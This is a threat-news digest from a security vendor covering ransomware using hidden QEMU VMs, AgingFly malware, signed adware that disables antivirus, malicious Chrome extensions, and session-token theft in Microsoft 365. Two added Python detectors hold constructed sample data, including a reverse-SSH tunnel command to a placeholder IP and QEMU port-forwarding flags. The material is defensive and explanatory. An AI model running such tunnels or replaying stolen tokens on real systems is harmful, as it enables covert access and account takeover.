Acronis
April 20, 2026

MSP cybersecurity news digest, April 20, 2026

Payouts King ransomware uses hidden QEMU virtual machines to evade endpoint detection, New AgingFly malware campaign compromises public sector and health care systems in Ukraine, and more. Here are the latest threats to MSP security.

Author: Acronis Threat Research Unit

Payouts King ransomware uses hidden QEMU virtual machines to evade endpoint detection

The Payouts King operation used QEMU as a reverse-SSH backdoor to run hidden virtual machines on compromised systems, allowing attackers to execute payloads and maintain covert access outside the visibility of host-based controls. The technique matters because security tools on the host often cannot inspect what runs inside the attacker-created VM.

Research described at least two campaigns, one linked directly to Payouts King and another tied to exploitation of CitrixBleed 2, with QEMU used to collect credentials and support remote access. This shows the virtualization layer is being used not only for stealth, but also for staging and credential operations before the ransomware phase.

The broader security implication is that ransomware operators are shifting from simple encrypt-and-extort behavior toward defense evasion plus covert infrastructure that helps them persist longer and reduce detection before encryption starts. That makes early behavioral detection more important than relying on file-based indicators alone.
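As an added illustration (not code from Acronis or the cited research), the triage helper below scores process-creation events for the traits this section describes: a QEMU binary launched headless, user-mode networking that forwards a host port into the guest, and a reverse SSH tunnel. Field names, paths and the sample events are constructed assumptions.

```python
# Added example, not code from the Acronis digest: a triage helper that flags
# QEMU launches with the traits the digest describes (headless VM, user-mode
# networking with host port forwarding, reverse-SSH tunnel). Field names,
# paths and the sample events are constructed assumptions, not real telemetry.
import re

HEADLESS_FLAGS = ("-nographic", "-display none", "-daemonize")
EXPECTED_DIRS = ("c:\\program files\\qemu\\", "/usr/bin/", "/usr/local/bin/")

def qemu_findings(event: dict) -> list:
    """Return the reasons one process-creation event looks like a covert VM."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    reasons = []
    if re.search(r"qemu-system-[\w-]+(\.exe)?$", image):
        if not image.startswith(EXPECTED_DIRS):
            reasons.append("QEMU binary outside its normal install path")
        if any(flag in cmd.lower() for flag in HEADLESS_FLAGS):
            reasons.append("VM started headless (no console a user would see)")
        if "hostfwd=" in cmd.lower():
            reasons.append("user-mode networking forwards a host port into the VM")
    elif image.endswith(("\\ssh.exe", "/ssh")) and re.search(r"\s-R\s", cmd):
        reasons.append("reverse SSH tunnel (ssh -R) exposes a local port remotely")
        if "qemu" in event.get("parent", "").lower():  # constructed correlation hint
            reasons.append("tunnel spawned by a QEMU process")
    return reasons

SAMPLE_EVENTS = [  # constructed; 203.0.113.0/24 is a documentation range
    {"image": r"C:\ProgramData\qemu\qemu-system-x86_64.exe", "parent": "powershell.exe",
     "cmdline": "qemu-system-x86_64.exe -m 2048 -hda vm.qcow2 -nographic "
                "-netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe", "parent": "qemu-system-x86_64.exe",
     "cmdline": "ssh.exe -N -R 9999:127.0.0.1:2222 relay@203.0.113.10"},
    {"image": r"C:\Program Files\qemu\qemu-system-x86_64.exe", "parent": "explorer.exe",
     "cmdline": "qemu-system-x86_64.exe -m 4096 -hda dev.qcow2"},
]

def triage(events):
    """Map each suspicious event's image to its findings; clean events are omitted."""
    return {e["image"]: r for e in events if (r := qemu_findings(e))}
```

The third sample, a developer's QEMU in its normal install path with a visible console, produces no findings, which is the point: the signal is the combination of traits, not the presence of QEMU itself.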

New AgingFly malware campaign compromises public sector and health care systems in Ukraine

AgingFly was identified in attacks against local governments and hospitals in Ukraine, with additional forensic indicators suggesting possible targeting of representatives of the Defense Forces. The campaign began with phishing emails disguised as humanitarian aid offers, showing how social engineering is still being paired with custom malware in public-sector operations.

The attack chain used compromised or fake sites to deliver an archive containing an LNK shortcut, which launched an HTA handler, created a scheduled task, and downloaded staged payloads. Researchers said the attackers also used tools for browser credential theft, WhatsApp database decryption, reconnaissance, tunneling and lateral movement.

AgingFly itself provides remote control, command execution, file exfiltration, screenshot capture, keylogging and arbitrary code execution, and dynamically compiles command handlers received from its command-and-control (C2) server. That design gives the operator a smaller initial payload and more flexibility while increasing the difficulty of static analysis.

Trusted signed binaries used to deploy tools that neutralize endpoint security controls

Researchers observed a digitally signed adware tool deploying payloads with SYSTEM privileges that disabled antivirus protections on more than 23,500 hosts across 124 countries in a single day. The affected endpoints included systems in education, utilities, government, and healthcare, which makes the campaign notable for both scale and sector reach.

The operation used signed executables associated with Dragon Boss Solutions LLC and an off-the-shelf update mechanism to deliver MSI and PowerShell-based payloads. The key problem is not just adware distribution, but the fact that the trusted signed software chain was used to deliver defense-evasion tooling that tampered with security products.

The broader implication is that attackers can weaponize software that appears low-risk or merely unwanted into an entry point for privileged security-control disruption, making signed binaries and PUP-style tooling a more serious enterprise concern than many teams assume.

Malicious Chrome extensions abuse trusted store access to steal tokens and session data

Researchers found more than 100 malicious Chrome Web Store extensions attempting to steal Google OAuth2 bearer tokens, establish backdoors and carry out ad fraud. The extensions were published across multiple categories and publisher identities, but analysis tied them to shared command-and-control infrastructure.

The campaign included 108 extensions overall, with reporting describing identity theft, Telegram session theft, ad injection and browser backdoor behavior. Because the extensions lived in the official Chrome Web Store, the threat model is more dangerous than sideloaded malware: users could install them through a channel they normally trust.

The broader implication is that browser extensions are now a mature attack surface for account takeover and data exfiltration. Attackers do not need an endpoint exploit if they can persuade users to install a malicious extension that already has access to browser sessions and web content.

Token theft and session abuse undermine MFA protections in Microsoft 365 attacks

Security researchers reported a targeted campaign using session hijacking and token abuse to compromise Microsoft environments. The attacks focused on high-value users and relied on trusted authentication flows and active sessions rather than traditional credential theft.

A key aspect of the activity was the theft of session cookies or authentication tokens, which allowed attackers to operate inside the environment without reauthenticating. Once a valid session is obtained, MFA and password controls no longer provide effective protection because the session is already trusted by the system.

This represents a post-authentication attack model in which attackers exploit active authenticated sessions rather than credentials, maintain access after password resets, and abuse legitimate user context across trusted services and workflows to avoid detection.
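As an added illustration (not code from Acronis or the researchers), the check below runs over constructed Microsoft 365-style sign-in and activity records and flags the two behaviours this section describes: a session token used from a new IP address or user agent without a fresh interactive sign-in, and a session that remains active after a password reset. The record field names are assumptions.

```python
# Added example, not from the Acronis digest: replay detection over constructed
# sign-in/activity records. A session token used from a new IP or user agent
# with no fresh interactive sign-in, or still active after a password reset,
# is flagged. Field names and timestamps are constructed assumptions.
from datetime import datetime

def _ts(s):
    return datetime.fromisoformat(s)

def session_anomalies(records):
    """Return {session_id: [reasons]} for sessions whose later use does not
    match the interactive sign-in that minted them."""
    origin = {}    # session_id -> (ip, user_agent) seen at interactive sign-in
    reset_at = {}  # user -> time of the most recent password reset
    findings = {}
    for r in sorted(records, key=lambda r: _ts(r["time"])):
        sid, user = r.get("session_id"), r["user"]
        if r["event"] == "password_reset":
            reset_at[user] = _ts(r["time"])
            continue
        if r["event"] == "interactive_signin":
            origin[sid] = (r["ip"], r["user_agent"])  # a new sign-in re-baselines the session
            continue
        # r["event"] == "activity": a request authenticated by an existing session token
        reasons = findings.setdefault(sid, [])
        add = lambda msg: reasons.append(msg) if msg not in reasons else None
        if sid not in origin:
            add("activity on a session with no observed interactive sign-in")
        else:
            ip0, ua0 = origin[sid]
            if r["ip"] != ip0:
                add(f"IP changed {ip0} -> {r['ip']} without re-authentication")
            if r["user_agent"] != ua0:
                add("user agent changed without re-authentication")
        if user in reset_at and _ts(r["time"]) > reset_at[user]:
            add("session still active after password reset (token not revoked)")
    return {sid: rs for sid, rs in findings.items() if rs}

SAMPLE_RECORDS = [  # constructed; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges
    {"time": "2026-04-15T08:00:00", "user": "cfo@example.com", "event": "interactive_signin",
     "session_id": "S1", "ip": "198.51.100.7", "user_agent": "Edge/Windows"},
    {"time": "2026-04-15T08:05:00", "user": "cfo@example.com", "event": "activity",
     "session_id": "S1", "ip": "198.51.100.7", "user_agent": "Edge/Windows"},
    {"time": "2026-04-15T09:10:00", "user": "cfo@example.com", "event": "activity",
     "session_id": "S1", "ip": "203.0.113.44", "user_agent": "Chrome/Linux"},
    {"time": "2026-04-15T09:30:00", "user": "cfo@example.com", "event": "password_reset"},
    {"time": "2026-04-15T09:45:00", "user": "cfo@example.com", "event": "activity",
     "session_id": "S1", "ip": "203.0.113.44", "user_agent": "Chrome/Linux"},
]
```

The last record is the one that matters operationally: a reset that does not also revoke existing sessions leaves the stolen token usable, so the response to a suspected hijack has to include session revocation, not just a password change.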